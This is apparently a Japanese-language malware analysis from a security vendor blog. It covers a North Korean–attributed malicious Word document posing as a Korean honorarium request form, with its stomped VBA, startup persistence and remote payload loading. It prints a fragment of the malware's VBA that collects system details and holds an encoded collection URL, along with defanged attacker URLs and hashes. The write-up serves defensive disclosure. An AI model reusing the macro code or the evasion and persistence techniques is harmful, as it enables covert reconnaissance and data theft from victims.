APT ターゲット型攻撃と推定される<謝金支給依頼書>という内容の不正な Word ドキュメントが再び拡散された。同様の文書内容のマルウェアは今年3月にも発見されており、ASEC ブログで関連する解析内容を公開した。今回発見された Word ドキュメントは最近作成されたものであり、従来の攻撃と内容は同じだが、動作方式に違いが見られた。この記事では、新たに発見された<謝金支給依頼書>の不正な Word ファイルの機能と特徴、そして同じ攻撃者(制作者)が作ったものと推定される関連ファイルについて説明する。
- ファイル名:사례비지급 의뢰서(양식).doc (翻訳:謝金支給依頼書(様式).doc)
- SHA256:811b42bb169f02d1b0b3527e2ca6c00630bebd676b235cd4e391e9e595f9dfa8
- 作成者:Network Group
- 前回保存者:Naeil_영문시작 (翻訳:Naeil_英文開始)
- 作成日時:2021/03/02 9:01:00
- 前回保存日時:2021/06/07 02:23:00Z
Word ドキュメントの作成者と前回保存者は、3月に発見された<謝金支給依頼書>と同じであった。前回の攻撃に使用したおとり文書を、最近再び編集して今回の攻撃に利用したものと見られる。
Word 文書は不正な VBA コードで動作する。VBA コードはアンチウイルス製品の検知を回避する目的で html ファイルの拡張子で保存されているが、これは動作には影響を与えない部分である。3月に発見された攻撃では yml ファイルの拡張子で VBA コードが保存されており、テンプレートインジェクションによって外部 URL を参照していた。
<Relationship Id="rId1" Type=http://schemas.microsoft.com/office/2006/relationships/vbaProject Target="asdgfa.html"VBA コードが Stomping されており、核心となる不正な VBA 関数は Text 入力行為(Selection.TypeText)があるときに実行される。Word 文書を開くことだけでは不正な機能が実行されない。以下は、VBA コード実行後の動作である。
- %AppData%\desktop.ini ファイル名で Visual Basic Script ファイルを生成および実行
- %AppData%\Microsoft\desktop.ini ファイル名で Visual Basic Script ファイルを生成
- スタートアッププログラムのパスにインターネットエクスプローラー(iexplore.exe)のショートカットファイルを生成(自動実行トリガー)
- インターネットエクスプローラーのショートカットファイルが %AppData%\Microsoft\desktop.ini ファイルを実行
VBA コードによって最終的に実行される %AppData%\Microsoft\desktop.ini ファイルは特定ブロガーのアドレスに接続して本文データを読み込んで実行する機能がある。すなわち、Web にアップロードされた不正なバイナリをリアルタイムで読み込んで実行する方式である。現在データは削除されているが、事前に確保しておいたデータを通して機能を確認することができた。
- 攻撃者の Web ページ:hxxps://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html
受け取ったデータを利用して実行する最終機能は、ユーザーのシステム情報の流出である。感染システムを偵察するための目的と見られる。攻撃者のサーバーアドレスは今年3月に発見された<謝金支給依頼書>と同じドメインを利用していた。
- (前回3月の攻撃) hxxp://ftcpark59[.]getenjoyment[.]net/1703/v[.]php
- (今回6月の攻撃) hxxp://alyssalove[.]getenjoyment[.]net/0423/v[.]php
- 現在 Running 中のサービスプロセスリストを収集
- OS 情報の収集
- .NET バージョン情報の収集
- Microsoft Office Excel プログラムのバージョン情報の収集
- 最近の実行ファイルリストの収集
- タスクバーに固定されたショートカットリストの収集
- 収集された情報は攻撃者のサーバーにパラメータとして格納され送信
今回の<謝金支給依頼書>の不正な Word ドキュメントファイルからは、攻撃者を特定付けられる一つの特徴が確認された。Word ドキュメントには、定義がされていないため正常に実行できない VBA マクロ関数「aaaaaaaaaaaa」が含まれている。しかし、「aaaaaaaaaaaa」関数は、他のターゲット型の不正な Word ドキュメントにも使用されている関数であって、正常に定義および呼び出しが可能な関数である。攻撃者が、マルウェア制作プロセスにおいて VBA マクロコードを一部共有したものとみられる。
Function ujmlkl()
On Error Resume Next
If (qazwsx = 7) Then
vfgbvcd = Application.Version
uname = Application.UserName
os = System.OperatingSystem
sv = System.Version
rdxvdw = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXNcXA"))
ki87ujhy = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXA"))
recent = tgbyhn
dfresxcvfd = aaaaaaaaaaaa("aHR0cDovLzIwMC4yMDAuMjAwLjIwMC90ZXN0L3YucGhw")
who = "shp"以下は、同じ aaaaaaaaaaaa 関数とこれを呼び出す関数が存在した不正な Word ドキュメントである。動作方式はすべて異なっているが、どれも最近確認された APT ターゲット型攻撃のマルウェアである。AhnLab は、この攻撃者(制作者)を同じ北朝鮮の攻撃グループであると推定している。
- 4/17 – 사례비지급 의뢰서.doc (翻訳:謝金支給依頼書.doc)
- 4/15 – [설문지] 2021 데이터기반 미래전망 연구_(평화안보).doc
(翻訳:[アンケート] 2021データベース未来展望研究_(平和安保).doc) - 4/15 – [설문지] 2021 데이터기반 미래전망 연구_(평화안보).doc
(翻訳:[アンケート] 2021データベース未来展望研究_(平和安保).doc) - 3/25 – 기획설문.doc (翻訳:企画設問.doc)
現在 AhnLab V3 プロダクトラインでは、関連するターゲット型攻撃の不正な Word ドキュメントを検知して自動で分類している。
[ファイル検知]
Downloader/DOC.Generic
Downloader/DOC.Agent
[IOC]
0821884168a644f3c27176a52763acc9
10b4773a35e693761089a4bddae588eb
49a04c85555b35f998b1787b325526e6
6a614ca002c5b3a4d7023faffc0546e1
95c92bcfc39ceafc1735f190a575c60c
hxxps://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html
hxxp://alyssalove[.]getenjoyment[.]net/0423/v[.]php
全体のコードと更に詳細な機能説明は、「次世代脅威インテリジェンスプラットフォーム」 ATIP で提供しています。
Categories:マルウェアの情報